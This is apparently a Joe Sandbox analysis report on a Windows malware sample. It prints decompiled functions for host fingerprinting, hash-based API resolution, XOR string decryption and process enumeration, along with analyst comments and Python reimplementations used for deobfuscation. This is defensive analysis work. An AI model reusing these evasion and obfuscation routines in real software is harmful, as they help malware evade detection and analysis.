            				void* _t216;
            
            				_t216 = __fp0;
            				_t148 =  *0x347f8e8; // 0x3460000, own image base
            				// Allocate the 0x1ac4-byte runtime context (RtlAllocateHeap in the subcall) and populate it below.
            				_t68 = E03468DC9(0x1ac4);
            				_t192 = _t68;
            				if(_t192 != 0) {
            					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId(); // ctx+0x1640: own PID
            					_t70 =  *0x347f8d0; // 0x50ff8c0
            					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
            					_t3 = _t192 + 0x648; // 0x648
            					E034735A9( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
            					_t73 =  *0x347f8d0; // 0x50ff8c0
            					_t5 = _t192 + 0x1644; // 0x1644
            					_t194 = _t5;
            					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
            					_t207 = _t74;
            					if(_t74 != 0) {
            						 *((intOrPtr*)(_t192 + 0x1854)) = E034697E9(_t194, _t207);
            					}
            					_t75 =  *0x347f8d0; // 0x50ff8c0
            					_t77 = E0346CA0A( *((intOrPtr*)(_t75 + 0x12c))()); // executed
            					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
            					_t159 =  *_t77;
            					if(E0346CB85( *_t77) == 0) {
            						_t79 = E0346CA5A(_t159, _t194); // executed
            						__eflags = _t79;
            						_t162 = (0 | _t79 > 0x00000000) + 1;
            						__eflags = _t162;
            						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
            					} else {
            						 *((intOrPtr*)(_t192 + 0x214)) = 3;
            					}
            					_t14 = _t192 + 0x220; // 0x220, executed
            					_t80 = E0346F3A0(_t14); // executed
            					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
            					_t81 = E0346F365(_t14); // executed
            					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
            					_t17 = _t192 + 0x114; // 0x114
            					_t195 = _t17;
            					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
            					_push( &_v16);
            					_v12 = 0x80;
            					_push( &_v8);
            					_v8 = 0x100;
            					_push( &_v656);
            					_push( &_v12);
            					_push(_t195);
            					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
            					_t87 =  *0x347f8d8; // 0x50ffab0
            					_push(0); // executed
            					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
            						GetLastError();
            					}
            					_t90 = GetSystemMetrics(0x1000); // SM_REMOTESESSION
            					_t28 = _t192 + 0x228; // 0x228
            					_t149 = _t28;
            					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000; // ctx+0x1850: 1 when running in a remote (RDP) session
            					E0346DFBB(_t149); // executed
            					_t211 = _t149;
            					if(_t149 != 0) {
            						 *((intOrPtr*)(_t192 + 0x434)) = E034697E9(_t149, _t211);
            					}
            					_t92 = E0346C85A();
            					_t33 = _t192 + 0xb0; // 0xb0
            					_t196 = _t33;
            					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
            					_t93 = E0346C64D(_t92, _t33, _t211, _t216);
            					_t35 = _t192 + 0xd0; // 0xd0
            					E03469BD5(_t93, _t33, _t35);
            					_t36 = _t192 + 0x438; // 0x438
            					E03469803(_t149, _t36);
            					_t97 = E0346E34A(_t196, E0346A5D0(_t33), 0);
            					_t37 = _t192 + 0x100c; // 0x100c
            					E0346C870(_t97, _t37, _t216);
            					_t99 =  *0x347f8d0; // 0x50ff8c0
            					_t101 = E0346CBD7( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
            					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
            					// The context starts with an OSVERSIONINFOEXA (dwOSVersionInfoSize = 0x9c) filled by GetVersionExA.
            					E03468F63(_t192, 0, 0x9c);
            					_t204 = _t203 + 0xc;
            					_t192->dwOSVersionInfoSize = 0x9c;
            					GetVersionExA(_t192);
            					 *((intOrPtr*)(_t192 + 0xa8)) = E0346DDBE(_t100);
            					_t106 = E0346DDE7(_t105);
            					_t41 = _t192 + 0x1020; // 0x1020
            					_t150 = _t41;
            					 *((short*)(_t192 + 0x9c)) = _t106;
            					GetWindowsDirectoryW(_t150, 0x104); // ctx+0x1020: Windows directory
            					_t108 = E03469F85(_t105, 0xf73);
            					_t177 =  *0x347f8d0; // 0x50ff8c0
            					_t198 = _t108;
            					 *_t204 = 0x104;
            					_push( &_v668);
            					_push(_t198);
            					_v8 = _t198;
            					// Slot +0xec is called as (name, buffer, size) and tested against 0, slot +0x108 as (name, value):
            					// the GetEnvironmentVariableW / SetEnvironmentVariableW pattern. The variable named by decrypted
            					// string 0xf73 is set to the Windows directory when it is missing; _v8 is released afterwards.
            					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
            						_t143 =  *0x347f8d0; // 0x50ff8c0
            						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
            					}
            					E03468D9A( &_v8);
            					_t113 =  *0x347f8d0; // 0x50ff8c0
            					_t48 = _t192 + 0x1434; // 0x1434
            					_t199 = _t48;
            					 *_t204 = 0x209;
            					_push(_t199);
            					_push(L"USERPROFILE");
            					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
            						// USERPROFILE missing: build "<windir>\..." into ctx+0x1434 (0x105 WCHARs) and set the variable.
            						E03469FE4(_t199, 0x105, L"%s\\%s", _t150);
            						_t141 =  *0x347f8d0; // 0x50ff8c0
            						_t204 =  &(_t204[5]);
            						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
            					}
            					_push(0x20a);
            					_t51 = _t192 + 0x122a; // 0x122a
            					_t151 = L"TEMP";
            					_t116 =  *0x347f8d0; // 0x50ff8c0
            					_push(_t151);
            					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
            						// TEMP missing: fall back to the USERPROFILE path just obtained (ctx+0x1434).
            						_t138 =  *0x347f8d0; // 0x50ff8c0
            						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
            					}
            					_push(0x40);
            					_t200 = L"SystemDrive";
            					_push( &_v144);
            					_t119 =  *0x347f8d0; // 0x50ff8c0
            					_push(_t200);
            					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
            						// SystemDrive missing: default to "C:".
            						_t136 =  *0x347f8d0; // 0x50ff8c0
            						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
            					}
            					// Slot +0xbc called as (buffer, &size = 0x7f): the GetComputerNameW pattern, result in ctx+0x199c.
            					_v8 = 0x7f;
            					_t59 = _t192 + 0x199c; // 0x199c
            					_t123 =  *0x347f8d0; // 0x50ff8c0
            					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
            					_t62 = _t192 + 0x100c; // 0x100c
            					E034735A9(E0346E34A(_t62, E0346A5D0(_t62), 0),  &_v2644);
            					_t63 = _t192 + 0x1858; // 0x1858
            					E0347357B( &_v2644, _t63, 0x20);
            					_push( &_v2644);
            					_push(0x1e);
            					_t66 = _t192 + 0x1878; // 0x1878
            					_t191 = 0x14;
            					E034698D0(_t66, _t191);
            					_t134 = E0346DB68(_t191); // executed
            					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
            					return _t192;
            				}
            				return _t68;
            			}

            APIs
              • Part of subcall function 03468DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03469793,00000100,?,0346661B), ref: 03468DD7
            • GetCurrentProcessId.KERNEL32 ref: 0346DFE9
            • GetLastError.KERNEL32 ref: 0346E0E3
            • GetSystemMetrics.USER32(00001000), ref: 0346E0F3
            • GetVersionExA.KERNEL32(00000000), ref: 0346E1A8
              • Part of subcall function 0346CA5A: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,03460000), ref: 0346CAFE
            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0346E1D3
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
            • API String ID: 3131805607-2706916422
            • Opcode ID: bf051b8f2b534e974b2cf0f82b569d499c524043c7acb9dd167ebae97377e5ac
            • Instruction ID: dcf949ff73e78d8c5a0c9df0e67bf0b2008c9827ce8baf425ca8a35f7d97a3c3
            • Opcode Fuzzy Hash: bf051b8f2b534e974b2cf0f82b569d499c524043c7acb9dd167ebae97377e5ac
            • Instruction Fuzzy Hash: E9916F79700705AFD704EF75D888FEAB7E8BF48700F04416AE519DF241DB70AA548BAA
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 94%
            			E0346C778(WCHAR* __ecx, WCHAR* __edx) {
            				// Machine identifier: <computer name><volume serial as %u><__ecx suffix>, upper-cased,
            				// returned as its E0346E34A hash. __edx is the 0x100-WCHAR output buffer.
            				long _v8;
            				long _v12;
            				WCHAR* _v16;
            				short _v528;
            				short _v1040;
            				short _v1552;
            				intOrPtr _t23;
            				WCHAR* _t27;
            				signed int _t29;
            				void* _t33;
            				long _t38;
            				WCHAR* _t43;
            				WCHAR* _t56;
            
            				_t44 = __ecx;
            				_v8 = _v8 & 0x00000000;
            				_t43 = __edx;
            				_t56 = __ecx;
            				E03468F63(__edx, 0, 0x100);
            				_v12 = 0x100;
            				_t23 =  *0x347f8d0; // 0x50ff8c0
            				// Resolved API in slot +0xbc, called as (buffer, &size): the GetComputerNameW pattern.
            				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
            				lstrcpynW(__edx,  &_v528, 0x100);
            				// Decrypted string 0x978 is the root path given to GetVolumeInformationW; the serial lands in _v8
            				// and is cleared again when the call fails (sbb/and idiom).
            				_t27 = E03469F85(_t44, 0x978);
            				_v16 = _t27;
            				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
            				asm("sbb eax, eax");
            				_v8 = _v8 &  ~_t29;
            				E03468D9A( &_v16); // release the decrypted string
            				_t33 = E0346A5E9(_t43);
            				// Append the serial in decimal, then the caller's suffix, and upper-case the whole string.
            				E03469FE4( &(_t43[E0346A5E9(_t43)]), 0x100 - _t33, L"%u", _v8);
            				lstrcatW(_t43, _t56);
            				_t38 = E0346A5E9(_t43);
            				_v12 = _t38;
            				CharUpperBuffW(_t43, _t38);
            				// _t40 is an unresolved decompiler temporary; the hash covers the finished string.
            				return E0346E34A(_t43, E0346A5E9(_t43) + _t40, 0);
            			}

            APIs
              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0346C7BF
            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0346C7F1
              • Part of subcall function 03469FE4: _vsnwprintf.MSVCRT ref: 0346A001
            • lstrcatW.KERNEL32(?,00000114), ref: 0346C82A
            • CharUpperBuffW.USER32(?,00000000), ref: 0346C83C
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
            • String ID:
            • API String ID: 455400327-0
            • Opcode ID: 93d871fc1d7c8ba01761e603043523783ca02980b70bd3befbc0e0c5bbd06105
            • Instruction ID: 3a75348aa0cd55916620abb04c8ac97963571a08de00e92cb14f752826ec824d
            • Opcode Fuzzy Hash: 93d871fc1d7c8ba01761e603043523783ca02980b70bd3befbc0e0c5bbd06105
            • Instruction Fuzzy Hash: B42174B6A00314BFD704EBA5DC49FAE77BCEF84200F10416AF505EA181EA749E048B65
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 179 346ef38-346ef4f 180 346ef51-346ef79 179->180 181 346efac 179->181 180->181 183 346ef7b-346ef9e call 346a5d0 call 346e34a 180->183 182 346efae-346efb2 181->182 188 346efb3-346efca 183->188 189 346efa0-346efaa 183->189 190 346f020-346f022 188->190 191 346efcc-346efd4 188->191 189->181 189->183 190->182 191->190 192 346efd6 191->192 193 346efd8-346efde 192->193 194 346efe0-346efe2 193->194 195 346efee-346efff 193->195 194->195 196 346efe4-346efec 194->196 197 346f004-346f010 LoadLibraryA 195->197 198 346f001-346f002 195->198 196->193 196->195 197->181 199 346f012-346f01c GetProcAddress 197->199 198->197 199->181 200 346f01e 199->200 200->182
            C-Code - Quality: 100%
            			E0346EF38(void* __ecx, intOrPtr __edx) {
            				// Hash-based export resolver: __ecx = base of a mapped module, __edx = (name hash ^ 0x218fe95b).
            				// The export directory is walked by hand, so no API names appear in the binary
            				// (cf. "PE file does not import any functions" / "dynamically determine API calls").
            				signed int _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				char _v92;
            				intOrPtr _t41;
            				signed int _t47;
            				signed int _t49;
            				signed int _t51;
            				void* _t56;
            				struct HINSTANCE__* _t58;
            				_Unknown_base(*)()* _t59;
            				intOrPtr _t60;
            				void* _t62;
            				intOrPtr _t63;
            				void* _t69;
            				char _t70;
            				void* _t75;
            				CHAR* _t80;
            				void* _t82;
            
            				_t75 = __ecx;
            				_v12 = __edx;
            				_t60 =  *((intOrPtr*)(__ecx + 0x3c)); // e_lfanew
            				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78)); // DataDirectory[EXPORT].VirtualAddress
            				if(_t41 == 0) {
            					L4:
            					return 0;
            				}
            				_t62 = _t41 + __ecx; // IMAGE_EXPORT_DIRECTORY
            				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx; // AddressOfNameOrdinals
            				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx; // AddressOfNames
            				_t63 =  *((intOrPtr*)(_t62 + 0x18)); // NumberOfNames
            				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx; // AddressOfFunctions
            				_t47 = 0;
            				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
            				_v8 = 0;
            				_v16 = _t63;
            				if(_t63 == 0) {
            					goto L4;
            				} else {
            					goto L2;
            				}
            				while(1) {
            					L2:
            					// hash(name, strlen(name)) ^ 0x218fe95b == wanted ?
            					_t49 = E0346E34A( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0346A5D0( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
            					_t51 = _v8;
            					if((_t49 ^ 0x218fe95b) == _v12) {
            						break;
            					}
            					_t73 = _v20;
            					_t47 = _t51 + 1;
            					_v8 = _t47;
            					if(_t47 < _v16) {
            						continue;
            					}
            					goto L4;
            				}
            				// Matched name index _t51: ordinal -> function RVA -> absolute address.
            				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
            				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
            				// An address inside the export directory (size at +0x7c) is a forwarder string "DLL.Function".
            				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
            					return _t80; // ordinary export
            				} else {
            					// Copy the DLL part (up to 0x40 chars, stopping at '.' or NUL) into _v92 ...
            					_t56 = 0;
            					while(1) {
            						_t70 = _t80[_t56];
            						if(_t70 == 0x2e || _t70 == 0) {
            							break;
            						}
            						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
            						_t56 = _t56 + 1;
            						if(_t56 < 0x40) {
            							continue;
            						}
            						break;
            					}
            					// ... append ".dll\0" and advance _t80 past the '.' to the function name.
            					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
            					 *((char*)(_t82 + _t56 - 0x54)) = 0;
            					if( *((char*)(_t56 + _t80)) != 0) {
            						_t80 =  &(( &(_t80[1]))[_t56]);
            					}
            					// Forwarded exports are the one place this resolver touches LoadLibraryA/GetProcAddress.
            					_t40 =  &_v92; // 0x6c6c642e
            					_t58 = LoadLibraryA(_t40); // executed
            					if(_t58 == 0) {
            						goto L4;
            					}
            					_t59 = GetProcAddress(_t58, _t80);
            					if(_t59 == 0) {
            						goto L4;
            					}
            					return _t59;
            				}
            			}
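The export walk above maps directly onto the IMAGE_EXPORT_DIRECTORY layout, including the forwarder case that the LoadLibraryA/GetProcAddress calls handle. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox. It reproduces the resolver over a constructed in-memory image so it runs offline; the sample's own hash function (E0346E34A) is not on this page, so a ROR13-add hash stands in for it and that substitution is an assumption. Only the XOR constant 0x218fe95b and the header offsets come from the decompiled code.

```python
import struct

HASH_XOR = 0x218FE95B   # constant XORed into the name hash before the compare in E0346EF38


def name_hash(name: bytes) -> int:
    """Stand-in for the sample's string hash E0346E34A, which is not on this page.
    ASSUMPTION: a ROR13-add hash is used only so the walk can be exercised."""
    h = 0
    for b in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


def _u32(img, off):
    return struct.unpack_from("<I", img, off)[0]


def _u16(img, off):
    return struct.unpack_from("<H", img, off)[0]


def _cstr(img, off):
    return bytes(img[off:img.index(b"\0", off)])


def resolve_export(img, wanted):
    """Walk IMAGE_EXPORT_DIRECTORY of a mapped image (RVA == offset, since the sample
    adds every RVA to the module base) and return the export whose hashed name,
    XORed with HASH_XOR, equals `wanted`.

    Returns ("rva", address) for a normal export, ("forward", "DLL.dll", "Func")
    for a forwarded export, or None when no name matches."""
    e_lfanew = _u32(img, 0x3C)
    exp_rva = _u32(img, e_lfanew + 0x78)    # DataDirectory[EXPORT].VirtualAddress
    exp_size = _u32(img, e_lfanew + 0x7C)   # DataDirectory[EXPORT].Size
    if exp_rva == 0:
        return None
    n_names = _u32(img, exp_rva + 0x18)     # NumberOfNames
    funcs = _u32(img, exp_rva + 0x1C)       # AddressOfFunctions
    names = _u32(img, exp_rva + 0x20)       # AddressOfNames
    ords = _u32(img, exp_rva + 0x24)        # AddressOfNameOrdinals
    for i in range(n_names):
        name = _cstr(img, _u32(img, names + 4 * i))
        if (name_hash(name) ^ HASH_XOR) != wanted:
            continue
        ordinal = _u16(img, ords + 2 * i)
        target = _u32(img, funcs + 4 * ordinal)
        if not (exp_rva <= target < exp_rva + exp_size):
            return ("rva", target)
        # The "address" lies inside the export directory: it is a forwarder string
        # "DLL.Function". The sample copies up to 0x40 chars of the DLL part, appends
        # ".dll" and resolves the name through LoadLibraryA/GetProcAddress.
        dll, _, func = _cstr(img, target).partition(b".")
        return ("forward", (dll[:0x40] + b".dll").decode(), func.decode())
    return None


def build_test_image():
    """Constructed minimal image (not a real DLL): export directory at RVA 0x200,
    two named exports, "Beta" forwarded to NTDLL.RtlBeta."""
    img = bytearray(0x400)
    exp, funcs, names, ords, strs, fwd = 0x200, 0x240, 0x250, 0x260, 0x280, 0x2C0
    struct.pack_into("<I", img, 0x3C, 0x80)                 # e_lfanew
    struct.pack_into("<II", img, 0x80 + 0x78, exp, 0x100)   # export dir RVA and size
    struct.pack_into("<IIII", img, exp + 0x18, 2, funcs, names, ords)
    struct.pack_into("<II", img, funcs, 0x1000, fwd)        # Alpha -> code, Beta -> forwarder
    struct.pack_into("<II", img, names, strs, strs + 6)
    struct.pack_into("<HH", img, ords, 0, 1)
    img[strs:strs + 11] = b"Alpha\0Beta\0"
    img[fwd:fwd + 14] = b"NTDLL.RtlBeta\0"
    return bytes(img)


if __name__ == "__main__":
    image = build_test_image()
    print(resolve_export(image, name_hash(b"Alpha") ^ HASH_XOR))
    print(resolve_export(image, name_hash(b"Beta") ^ HASH_XOR))
```

With the real hash swapped in, the same walk run over kernel32.dll and ntdll.dll recovers the API names behind the hashes the sample passes to E0346EF38, which is the usual way to relabel the indirect calls through the table at 0x347f8d0.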

            APIs
            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0346F008
            • GetProcAddress.KERNEL32(00000000,?), ref: 0346F014
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: .dll
            • API String ID: 2574300362-2738580789
            • Opcode ID: 74c446ed9f3e6f2089ebbdced29686edc74dbf2dbd7b87db25ed223b10f2d916
            • Instruction ID: eb9833fccf88630ac0dd4590b4076b7c35fbcaef520eabf389f2fe750bb11903
            • Opcode Fuzzy Hash: 74c446ed9f3e6f2089ebbdced29686edc74dbf2dbd7b87db25ed223b10f2d916
            • Instruction Fuzzy Hash: 6231E635A00255ABCB18CFADD980BAEFBF9AF44244F28046AD845EF341D730D981C799
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 201 3468bcd-3468be2 202 3468be4-3468be7 201->202 203 3468c05 201->203 204 3468bee-3468bfe 202->204 205 3468c0a-3468c2a 203->205 206 3468c00-3468c03 204->206 207 3468c5d-3468c5f 204->207 208 3468c2c-3468c31 205->208 209 3468c3a-3468c3e 205->209 206->203 206->204 207->203 213 3468c61-3468c65 call 3468dc9 207->213 208->208 210 3468c33-3468c38 208->210 211 3468c40-3468c4a 209->211 212 3468c4c-3468c56 lstrlenW 209->212 210->209 210->211 211->211 211->212 214 3468c58-3468c5c 212->214 216 3468c6a-3468c72 213->216 217 3468c74-3468c79 216->217 218 3468c7b-3468c80 216->218 217->214 219 3468c82-3468c99 218->219 219->219 220 3468c9b-3468c9e 219->220 220->205
            C-Code - Quality: 80%
            			E03468BCD(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
            				// String decryption: __ecx = encrypted blob, __edx = blob length, _a4 = XOR key, _a12 = start offset.
            				// The key is cycled with period 0x5a (90); a plaintext NUL shows up as blob[i] == key[i % 0x5a].
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v28;
            				short _v44;
            				void* _t38;
            				intOrPtr _t47;
            				void* _t53;
            				intOrPtr _t54;
            				intOrPtr _t55;
            				intOrPtr _t56;
            				void* _t58;
            				intOrPtr _t59;
            				void* _t62;
            				void* _t64;
            				signed int _t71;
            				signed int _t74;
            				void* _t76;
            				void* _t77;
            
            				_t71 = _a12;
            				_t53 = __edx;
            				_v8 = __ecx;
            				_t74 = _t71;
            				if(_t71 >= __edx) {
            					L4:
            					// Fallback: a fixed string in the image (the report lists "GetCurrentPath" among this function's strings).
            					_t54 = 0x347f94e;
            					L5:
            					// The rest of this path (15-byte copy, length count capped at 0xe, digits written into _v44,
            					// lstrlenW) never touches _t54, which is the value returned.
            					_t58 = 0;
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsw");
            					asm("movsb");
            					asm("stosd");
            					asm("stosd");
            					asm("stosd");
            					asm("stosw");
            					asm("stosb");
            					_t38 = 0;
            					if(_v28 == 0) {
            						L8:
            						_t64 = _t38;
            						if(_t64 == 0) {
            							L10:
            							lstrlenW( &_v44);
            							return _t54;
            						} else {
            							goto L9;
            						}
            						do {
            							L9:
            							_t19 = _t58 + 0x30; // 0x30
            							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
            							_t58 = _t58 + 1;
            						} while (_t58 < _t64);
            						goto L10;
            					} else {
            						goto L6;
            					}
            					do {
            						L6:
            						_t38 = _t38 + 1;
            					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
            					_t64 = 0xe;
            					if(_t38 > _t64) {
            						goto L9;
            					}
            					goto L8;
            				}
            				_t59 = _a4;
            				_a12 = 0x5a; // parameter slot reused to hold the key length
            				// Scan forward from the start offset for the encrypted NUL terminator.
            				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
            					_t74 = _t74 + 1;
            					if(_t74 < _t53) {
            						continue;
            					}
            					goto L4; // ran off the end of the blob
            				}
            				_t76 = _t74 - _t71; // plaintext length
            				if(_t76 == 0) {
            					goto L4;
            				}
            				// Heap buffer of length + 1, leaving room for the terminator.
            				_t47 = E03468DC9(_t76 + 1); // executed
            				_t55 = _t47;
            				_v12 = _t55;
            				if(_t55 != 0) {
            					_t56 = _a4;
            					_t62 = _t55 - _t71;
            					do {
            						// out[i - start] = blob[i] ^ key[i % 0x5a]
            						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
            						_t71 = _t71 + 1;
            						_t76 = _t76 - 1;
            					} while (_t76 != 0);
            					_t54 = _v12;
            					goto L5;
            				}
            				return 0x347f94e;
            			}
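The decryption loop above is what an analyst reimplements to dump every string the sample uses; the callers earlier on this page obtain strings through E03469F85 with indices such as 0x978 and 0xf73, which is consistent with this routine's start-offset parameter. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox. decrypt_string mirrors the routine (terminator search by comparing blob byte to key byte, key cycled modulo 0x5a, None where the sample returns its fixed fallback string). build_blob is a constructed inverse used only to produce test data; the key and the strings in the test are made up, not recovered from pebbles.dat.dll.

```python
KEY_LEN = 0x5A   # the routine indexes its key modulo 0x5a (90 bytes)


def decrypt_string(blob: bytes, key: bytes, start: int):
    """Mirror of E03468BCD.

    The string ends at the first i >= start where blob[i] == key[i % 90], which is
    where the plaintext byte is 0. Returns None in the two cases where the sample
    hands back its built-in default string instead: no terminator before the end
    of the blob, or an empty string.
    """
    i = start
    while i < len(blob) and blob[i] != key[i % KEY_LEN]:
        i += 1
    if i >= len(blob) or i == start:
        return None
    return bytes(blob[j] ^ key[j % KEY_LEN] for j in range(start, i))


def build_blob(strings, key):
    """Constructed inverse (not from the sample): pack NUL-terminated strings and XOR
    each byte with the key at its absolute position. Returns the blob and the start
    offset of every string, which is the index a caller would pass."""
    blob = bytearray()
    offsets = []
    for s in strings:
        offsets.append(len(blob))
        for ch in s + b"\0":
            blob.append(ch ^ key[len(blob) % KEY_LEN])
    return bytes(blob), offsets


def dump_all(blob: bytes, key: bytes):
    """Walk the blob from offset 0 and recover every string in order, skipping empty ones."""
    out, pos = [], 0
    while pos < len(blob):
        if blob[pos] == key[pos % KEY_LEN]:   # encrypted NUL: empty string
            pos += 1
            continue
        s = decrypt_string(blob, key, pos)
        if s is None:                         # unterminated tail
            break
        out.append(s)
        pos += len(s) + 1
    return out


if __name__ == "__main__":
    key = bytes((7 * i + 3) & 0xFF for i in range(KEY_LEN))   # constructed key
    blob, offs = build_blob([b"GetCurrentPath", b"kernel32.dll", b"%s\\%s"], key)
    print(offs, dump_all(blob, key))
```

Because the key position is the absolute blob offset rather than the offset within the string, a dump that starts at a wrong index decrypts to garbage even with the right key; dump_all therefore starts at 0 and advances string by string, exactly as the sample's callers index into the table.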

            APIs
            • lstrlenW.KERNEL32(?,00000138,?,0347CA88), ref: 03468C50
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: lstrlen
            • String ID: GetCurrentPath$Z
            • API String ID: 1659193697-4005238709
            • Opcode ID: 93c422dda84a582d8f45ef44815606182d3416c842ec7a8f8bc16fe723fef564
            • Instruction ID: 8a650cf056dc69fa112cf4527946fd1183a71e86c5b934a8c199e7276b606660
            • Opcode Fuzzy Hash: 93c422dda84a582d8f45ef44815606182d3416c842ec7a8f8bc16fe723fef564
            • Instruction Fuzzy Hash: FE212371B017896FCB14CFADC8804AFBBA6BF9D210B28047AD941AF305D6319D468799
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            Graph image not preserved. Basic blocks: 221 346baf6-346bb1e (CreateToolhelp32Snapshot); 222 346bb20-346bb49 (call 3468f63, Process32First); 223 346bb8e-346bb94; 226 346bb4b-346bb57; 227 346bb59-346bb69 (call 346daf2); 230 346bb7e-346bb8b (FindCloseChangeNotification); 231 346bb6b-346bb7c. Edges: 221->222, 221->223, 222->226, 222->227, 226->223, 227->230, 227->231, 230->223, 231->227, 231->230.
            C-Code - Quality: 72%
            			E0346BAF6(void* __ecx, void* __edx) {
            				void* _v304;
            				char _v308;
            				intOrPtr _v312;
            				signed int _t16;
            				signed int _t17;
            				intOrPtr _t30;
            				void* _t33;
            				intOrPtr _t38;
            				void* _t43;
            				void* _t45;
            
            				_t33 = __edx;
            				_v304 = __ecx;
            				_t16 = CreateToolhelp32Snapshot(2, 0);
            				_t45 = _t16;
            				_t17 = _t16 | 0xffffffff;
            				if(_t45 != _t17) {
            					E03468F63( &_v304, 0, 0x128);
            					_v304 = 0x128;
            					if(Process32First(_t45,  &_v304) != 0) {
            						while(1) {
            							_t43 = _v312( &_v308, _t33);
            							if(_t43 == 0) {
            								break;
            							}
            							_t38 =  *0x347f8d0; // 0x50ff8c0
            							_push( &_v308);
            							_push(_t45);
            							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
            								continue;
            							}
            							break;
            						}
            						FindCloseChangeNotification(_t45);
            						_t17 = 0 | _t43 == 0x00000000;
            					} else {
            						_t30 =  *0x347f8d0; // 0x50ff8c0
            						 *((intOrPtr*)(_t30 + 0x30))(_t45);
            						_t17 = 0xfffffffe;
            					}
            				}
            				return _t17;
            			}

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0346BB14
